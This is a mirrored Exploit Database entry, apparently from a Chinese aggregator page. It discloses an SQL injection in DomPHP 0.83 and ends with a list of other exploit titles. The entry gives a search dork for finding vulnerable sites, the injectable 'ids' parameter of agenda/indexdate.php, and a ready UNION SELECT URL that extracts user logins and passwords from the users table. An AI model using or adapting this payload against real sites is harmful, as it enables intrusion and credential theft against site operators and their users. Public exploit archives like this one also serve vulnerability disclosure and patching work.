DomPHP 0.83 – SQL Injection

Exploit Database
125 阅读

作者： Houssamix

日期： 2014-01-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/30872/

-------------------------------------------------------------

DomPHP <= v0.83 SQL Injection Vulnerability

-------------------------------------------------------------

= Author : Houssamix

= Script : DomPHP <= v0.83

= Download : http://www.domphp.com/download/

= BUG :SQL Injection Vulnerability

= DORK : Site créé à l'aide du CMS DomPHP v0.83

= Exploit :

http://[target]/agenda/indexdate.php?ids=77 [SQL]

Exemple :

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--

last Exploits
DomPHP 0.83 – SQL Injection的更多信息

html-edit CMS – Multiple Vulnerabilities：
Advanced Comment System 1.0 – ‘ACS_path’ Path Traversal：
IBM Websphere Portal – Persistent Cross-Site Scripting：
Schoolhos CMS – HTML Injection：
Hucart CMS 5.7.4 – Cross-Site Request Forgery (Add Administrator Account)：
Centreon 19.10.5 – Remote Command Execution：
RAD SecFlow-1v SF_0290_2.3.01.26 – Persistent Cross-Site Scripting：
Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root：